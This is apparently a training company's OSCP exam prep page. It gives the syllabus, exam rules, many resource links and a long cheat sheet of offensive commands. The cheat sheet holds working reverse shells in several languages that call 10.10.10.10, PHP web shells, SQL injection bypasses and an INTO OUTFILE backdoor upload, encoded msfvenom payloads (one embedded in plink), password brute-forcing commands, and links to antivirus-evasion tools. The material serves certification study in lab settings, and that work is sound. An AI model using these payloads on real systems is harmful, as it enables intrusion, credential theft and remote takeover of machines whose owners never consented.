OSCP

What is OSCP?

The Offensive Security Certified Professional is one of the most technical and most challenging certifications for information security professionals.

To become certified you must complete the Penetration Testing with Kali Linux (PwK) course and pass a “24 hour” hands-on exam; after the exam you have a further 24 hours to write the report.

OSCP Syllabus :

● Getting Started with Kali Linux
● Command Line Fun
● Practical Tools
● Bash Scripting
● Passive Information Gathering
● Active Information Gathering
● Vulnerability Scanning
● Web Application Attacks
● Buffer Overflows
● Client-Side Attacks
● Locating Public Exploits
● Fixing Exploits
● File Transfers
● Antivirus Evasion
● Privilege Escalation
● Password Attacks
● Port Redirection and Tunneling
● Active Directory Attacks
● The Metasploit Framework
● PowerShell Empire
● Penetration Test Breakdown

Prerequisites

Before you decide to register for the course you need to have some experience in the following areas :

● Linux Fundamentals :
▸ File System
▸ Command Line

● TCP/IP Networking Fundamentals :
▸ TCP/IP addressing and Subnetting
▸ Understanding how network Traffic is sent & received
▸ Types of protocols and services running on them.

● Programming Languages :
▸ Bash
▸ Python

● Note Taking :
▸ Cherry Tree
▸ KeepNote

Exam Details

● You will have a total of 23 hours and 45 mins for the exam.
● You will be proctored during your exam. Webcam and screen sharing software are required.
● The exam will consist of 5 target systems that are vulnerable and can be compromised.
● You need a minimum of 70 points to pass.
● Once you believe you have enough points, you have another 24 hours to write your report.
● An extra 5 points will be given if you are able to complete the lab report and the course exercises.

Restrictions :

You cannot use any of the following on the exam :

● Spoofing (IP, ARP, DNS, NBNS, etc)
● Commercial tools or services (Metasploit Pro, Burp Pro, etc.)
● Automatic exploitation tools (e.g. browser_autopwn, SQLmap, SQLninja, jsql, etc.)
● Mass vulnerability scanners (e.g. Nessus, NeXpose, OpenVAS, Core Impact, SAINT, etc.)

Exam Tips :

● Enumeration is the most important thing you can do.
● Prepare your cheat sheets, notes, tools, and exploits.
● Note everything.
● Be patient and believe in yourself; everything will fall into place.

Official Support :

● Penetration Testing with Kali Linux (PEN-200) : https://help.offensive-security.com/hc/en-us/categories/360003918111-Penetration-Testing-with-Kali-Linux-PEN-200-

Lab Setup

VMware Workstation or VirtualBox

● Kali Linux : https://www.kali.org/downloads/
▸ If you want to play with the custom image that is made for the course, you can find it here : https://images.offensivesecurity.com/pwk-kali-vm.7z

● Windows 7 (32bit/64bit) : https://www.microsoft.com/en-in/software-download/windows7

Getting Started with Kali Linux

● Kali Linux Revealed : https://kali.training/
● Linux Journey : https://linuxjourney.com/
● Explain Shell : https://www.explainshell.com
● TryHackMe - Linux Fundamentals : https://tryhackme.com/module/linux-fundamentals
● TryHackMe - Linux Challenges : https://tryhackme.com/room/linuxctf

Command Line Fun

● The Linux Command Line : http://linuxcommand.org
● The Linux Command Line, 2nd Edition (Book) : https://www.amazon.in/dp/1593279523/
● RTFM - Red Team Field Manual (Book) : https://www.amazon.in/dp/1494295504
● BTFM - Blue Team Field Manual (Book) : https://www.amazon.in/dp/154101636X

Practical Tools

● Netcat
● PowerShell
● Wireshark
● Tcpdump

● Kali Linux Tools : https://tools.kali.org/tools-listing

Bash Scripting

● Bash Resource : https://hacktronian.in/resources/programming.html#bash
● Linux Command Line and Shell Scripting Bible (Book) : https://www.amazon.in/dp/111898384X

Passive Information Gathering

In passive information gathering we collect information about the targets from publicly available sources only, without interacting with the targets directly.

● Taking Notes : https://www.sublimetext.com/
● Website Recon : Gather basic information by simply browsing the site.
● Whois Enumeration : How to Use the whois Command on Linux / https://whois.domaintools.com/
● Google Hacking : Google Dork Cheatsheet / Google Hacking Database
● Netcraft : https://www.netcraft.com/
● Recon-ng : The Recon-ng Framework - GitHub
● Open-Source Code : Search Source-code Online
● Shodan : https://www.shodan.io/
● Spyse : https://spyse.com/
● Censys : https://censys.io/
● Security Headers Scanner : https://securityheaders.com/
● SSL Server Test : https://www.ssllabs.com/ssltest/
● Pastebin : https://pastebin.com/
● Email Harvesting : https://github.com/laramies/theharvester
● Social Media Tools : Gather information on target's social media accounts
● Stack Overflow : https://stackoverflow.com/
● OSINT Framework : https://osintframework.com/

Active Information Gathering

In active information gathering we gather more information about these targets by interacting with them directly, for example through port scanning, OS fingerprinting, and DNS, SMB, NFS, SMTP and SNMP enumeration.

● The Official Nmap Project Guide : https://nmap.org/book/toc.html
● Nmap : https://nmap.org/
● Masscan : https://github.com/robertdavidgraham/masscan
● DNS Recon : https://github.com/darkoperator/dnsrecon

Vulnerability Scanning

● Nessus : https://www.tenable.com/products/nessus
● Sn1per : https://github.com/1N3/Sn1per
● Nexpose : https://www.rapid7.com/products/nexpose/
● Nipper : https://www.titania.com/products/nipper/
● Acunetix : https://www.acunetix.com/
● OpenVAS : https://www.openvas.org/

● Getting Started with Nessus on Kali Linux : https://www.tenable.com/blog/getting-started-with-nessus-on-kali-linux

Web Application Attacks

● Web Application Enumeration : View Page Source-code, Nmap, Nikto, DirBuster, GoBuster, Whatweb
● Burp Suite : https://portswigger.net/burp
● OWASP Top Ten : https://owasp.org/www-project-top-ten/

Buffer Overflows

● Buffer Overflows Made Easy by TCM : YouTube
● 32-Bit Windows Buffer Overflows Made Easy : veteransec.com
● Buffer Overflows for Dummies : https://www.sans.org/reading-room/whitepapers/threats/buffer-overflows-dummies-481
● Buffer Overflow Exploitation Megaprimer for Linux : http://www.securitytube.net/groups?operation=view&groupId=4

Client-Side Attacks

https://www.offensive-security.com/metasploit-unleashed/client-side-attacks/

Locating Public Exploits

● Exploit-DB : https://www.exploit-db.com/
● Searchsploit : https://github.com/offensive-security/exploitdb

Fixing Exploits

Resource will be updated soon.

File Transfers

File Transfer Commands :
● Transfer files from Kali to the target machine : https://awakened1712.github.io/oscp/oscp-transfer-files/

Antivirus Evasion

● Undetectable Malware : how-to-write-fully-undetectable-malware.pdf
● Tools & Techniques Used to Evade Antivirus Software : https://www.youtube.com/watch?v=VrivVd-j7Ys
● Msfvenom : Payloads
● Obfuscated Empire : https://github.com/cobbr/ObfuscatedEmpire
● WinPayloads : https://github.com/nccgroup/Winpayloads
● AVET : https://github.com/govolution/avet
● HERCULES – Payload Generator : https://github.com/EgeBalci/HERCULES
● Shellter and Shellter Pro : https://www.shellterproject.com/exclusive-features/
● Veil-Framework : https://github.com/Veil-Framework/Veil
● Unicorn : https://github.com/trustedsec/unicorn
● FatRat : https://github.com/Screetsec/TheFatRat

Privilege Escalation

● Payloads All The Things : https://github.com/swisskyrepo/PayloadsAllTheThings

● Linux :
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
https://github.com/rebootuser/LinEnum
https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh
https://github.com/mzet-/linux-exploit-suggester
https://gtfobins.github.io
Linux Privilege Escalation for OSCP & Beyond! by Tib3rius

● Windows :
https://fuzzysecurity.com/tutorials/16.html
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
https://github.com/411Hall/JAWS
https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
https://guif.re/windowseop
https://daya.blog/2018/01/06/windows-privilege-escalation/
https://absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://github.com/AddaxSoft/OSWindowsPrivEscalation/blob/master/index.md
https://github.com/frizb/Windows-Privilege-Escalation
Windows Privilege Escalation for OSCP & Beyond! by Tib3rius

Password Attacks

● Offline Password Cracking :
▸ Hashcat : https://hashcat.net/hashcat/
▸ John the Ripper : https://www.openwall.com/john/

● Online Password Cracking :
▸ Hydra : https://github.com/vanhauser-thc/thc-hydra
▸ Medusa : http://h.foofus.net/?page_id=51

● Wordlist Generators :
▸ Cewl : https://github.com/digininja/CeWL
▸ Crunch : https://tools.kali.org/password-attacks/crunch

● Wordlist :
▸ Kali Linux includes a lot of dictionary files in /usr/share/wordlists
▸ Seclists Password Wordlist : https://github.com/danielmiessler/SecLists/tree/master/Passwords

● Online Password Hash Cracker :
https://crackstation.net/
https://www.onlinehashcrack.com/
https://gpuhash.me/
https://www.dcode.fr/hash-function#f0

Port Redirection and Tunneling

● SSH Tunneling : SSH Tunneling / Pivoting
● Proxychains : https://github.com/haad/proxychains
● SSHuttle : https://github.com/sshuttle/sshuttle
● Rinetd : https://github.com/samhocevar/rinetd
● Windows Port Forwarding : http://woshub.com/port-forwarding-in-windows/

Active Directory Attacks

● TryHackMe - Active Directory Basics : https://tryhackme.com/room/activedirectorybasics
● Attacking and Defending Active Directory
● Offensive Active Directory 101
● Active Directory Attack.md

The Metasploit Framework

https://www.metasploit.com/
● Metasploit Unleashed : https://www.offensive-security.com/metasploit-unleashed/
● Metasploit: The Penetration Tester's Guide (Book) : https://www.amazon.in/dp/B005EI84KQ

PowerShell Empire

https://www.powershellempire.com/
● TryHackMe - Empire : https://tryhackme.com/room/rppsempire
● Learn PowerShell Empire 2 From A to Z : https://www.youtube.com/watch?v=0gHS3U9zMKI
● Getting Started with Post-Exploitation of Windows Hosts : https://null-byte.wonderhowto.com/how-to/use-powershell-empire-getting-started-with-post-exploitation-windows-hosts-0178664/
● Powershell Empire 101 : https://www.ired.team/offensive-security/red-team-infrastructure/powershell-empire-101

Penetration Test Breakdown

Resource will be updated soon.

Helpful Commands

A few helpful commands :

The Ultimate List of SANS Cheat Sheets :

https://www.sans.org/blog/the-ultimate-list-of-sans-cheat-sheets/

Nmap :

● Quick TCP Scan
nmap -sC -sV -vv -oA quick 10.10.10.10

● Quick UDP Scan
nmap -sU -sV -vv -oA quick_udp 10.10.10.10

● Full TCP Scan
nmap -sC -sV -p- -vv -oA full 10.10.10.10

● Port knock
for x in 7000 8000 9000; do nmap -Pn --host-timeout 201 --max-retries 0 -p $x 10.10.10.10; done

Web Scanning :

● Gobuster quick directory busting
gobuster dir -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux

● Gobuster search with file extension
gobuster dir -u http://10.10.10.10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 80 -a Linux -x txt,php

● Nikto web server scan
nikto -h 10.10.10.10

● Wordpress scan
wpscan --url http://10.10.10.10/wp/

Port Checking :

● Netcat banner grab
nc -v 10.10.10.10 port

● Telnet banner grab
telnet 10.10.10.10 port

Netcat :

● Download netcat for windows
http://bit.ly/netcat_exe

● Sending file via netcat
nc 10.10.10.10 1234 < file.zip

● Receive file via netcat
nc -l -p 1234 > file.zip

File Transfers :

● HTTP Server (Python 2 / Python 3)
python -m SimpleHTTPServer 80
python3 -m http.server 80

● HTTP in reverse shell - Linux
wget 10.10.10.10/file

● HTTP in reverse shell - Windows
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://10.10.10.10/file.exe','C:\Users\user\Desktop\file.exe')"

● FTP in Kali
python -m pyftpdlib -p 21 -w

● FTP in reverse shell
echo open 10.10.10.10 > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

● Execute
ftp -v -n -s:ftp.txt

● TFTP in Kali
atftpd --daemon --port 69 /tftp

● TFTP in reverse shell
tftp -i 10.10.10.10 GET nc.exe

SSH :

● Connection (if you have password)
ssh user@10.10.10.10

● Connection (if you have ssh key)
ssh -i id_rsa user@10.10.10.10

● Create SSH Keys
ssh-keygen

● SSH Public key (.pub file) Permission
chmod 644 id_rsa.pub

● SSH Private key (id_rsa) & authorized_keys File Permission
chmod 600 id_rsa

● SSH Password Cracking using Key :
Download sshng2john.py : Github
Get Hash : python /opt/JohnTheRipper/run/sshng2john.py id_rsa > USERHASH
Crack Hash : john --wordlist=/usr/share/wordlists/rockyou.txt USERHASH

● Crack SSH Password using Hydra :
hydra -l username -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.10

SSH Tunneling / Pivoting :

● Sshuttle
sshuttle -vvr user@10.10.10.10 10.0.0.1/24

● Local port forwarding
ssh gateway -L local-port-to-listen:10.10.10.10:remote-port

● Remote port forwarding
ssh gateway -R remote-port-to-bind:127.0.0.1:local-port

● Dynamic port forwarding
ssh -D local-proxy-port -p remote-port 10.10.10.10

● Plink remote port forwarding
plink -l root -pw pass -R 3389:127.0.0.1:3389 10.10.10.10

SMB :

● SMB Vulnerability Scan
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse 10.10.10.10

● SMB Users & Shares Scan
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.10.10

● Enum4linux
enum4linux -a 10.10.10.10

● Null connect
rpcclient -U "" 10.10.10.10

● Connect to SMB share
smbclient //10.10.10.10/share

SNMP :

● SNMP enumeration
snmp-check 10.10.10.10

Reverse Shells :

● Bash shell
bash -i >& /dev/tcp/10.10.10.10/4443 0>&1

● Netcat Linux
nc -e /bin/sh 10.10.10.10 4443

● Netcat Windows
nc -e cmd.exe 10.10.10.10 4443

If you have the wrong version of netcat installed, Jeff Price points out here that you might still be able to get your reverse shell back like this :
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

● Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

● Perl
perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

● Remote Desktop
Remote Desktop for windows with share and 85% screen
rdesktop -u username -p password -g 85% -r disk:share=/root/ 10.10.10.10

● PHP
php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

● Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

● Java (Groovy syntax)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

● xterm
One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you (10.10.10.10) on TCP port 6001.
xterm -display 10.10.10.10:1

To catch the incoming xterm, start an X-Server (:1 – which listens on TCP port 6001). One way to do this is with Xnest (to be run on your system):
Xnest :1

You’ll need to authorise the target to connect to you (command also run on your host):
xhost +10.10.10.10

PHP :

● PHP command injection from GET Request
<?php echo system($_GET["cmd"]); ?>

● Alternative
<?php echo shell_exec($_GET["cmd"]); ?>

Powershell :

● Non-interactive execute powershell file
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File file.ps1

SQL Injection :

● sqlmap crawl
sqlmap -u http://10.10.10.10 --crawl=1

● sqlmap dump database
sqlmap -u http://10.10.10.10 --dbms=mysql --dump

● sqlmap shell
sqlmap -u http://10.10.10.10 --dbms=mysql --os-shell

● Upload php command injection file
union all select 1,2,3,4,"",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'

● Load file
union all select 1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6

● Bypasses
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -

Brute force :

● John the Ripper shadow file
unshadow passwd shadow > unshadow.db
john unshadow.db

● Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

● Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username

● Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt

● Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force

● Hashcat Wordpress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt

● RDP user with password list
ncrack -vv --user offsec -P passwords rdp://10.10.10.10

● SSH user with password list
hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22

● FTP user with password list
medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp

MSFVenom Payloads :

● PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f raw -o shell.php

● Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f war -o shell.war

● Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b "\x00\x0a\x0d\x20" -e x86/shikata_ga_nai

● Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f elf -o shell.elf

● Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f c

● Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o non_staged.exe

● Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe

● Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f python -o shell.py

● Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f asp -e x86/shikata_ga_nai -o shell.asp

● Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx

● Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f js_le -e generic/none -n 18

● Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1

● Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=10.10.10.10 LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e x86/shikata_ga_nai

● Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -o shell.exe

● Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=4443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe

Shell Spawning :

● TTY using Python (in reverse shell)
python -c 'import pty; pty.spawn("/bin/bash")'
or
python3 -c 'import pty; pty.spawn("/bin/bash")'

● Put the shell into the background with Ctrl+Z
Ctrl+Z

● Examine the current terminal and STTY info and match it
echo $TERM
stty -a

● Python (os.system)
echo os.system('/bin/bash')

● Interactive sh
/bin/sh -i

● Perl (from within the interpreter)
exec "/bin/sh";

● Perl one-liner
perl -e 'exec "/bin/sh";'

● Ruby
exec "/bin/sh"

● Lua
os.execute('/bin/sh')

● (from within IRB)
exec "/bin/sh"

● (from within vi)
:!bash

● (from within vi)
:set shell=/bin/bash:shell

● (from within nmap)
!sh

Practice Labs :

VulnHub :

List of PWK/OSCP Boxes

HackTheBox :

● IPPSEC : https://www.youtube.com/c/ippsec
● TJ_Null’s OSCP Prep : https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf

Our Paid Training :

https://hacktronian.in/services/cybersecurity-training.html

More Resources

The Journey to Try Harder: TJnull’s Preparation Guide for PWK/OSCP
How to prepare for PWK/OSCP, a noob-friendly guide
A Detailed Guide on OSCP Preparation – From Newbie to OSCP
Scund00r Passing OSCP
The Ultimate OSCP Preparation Guide, 2021

New Resources will be updated soon....


© Hacktronian / All Rights Reserved / Policy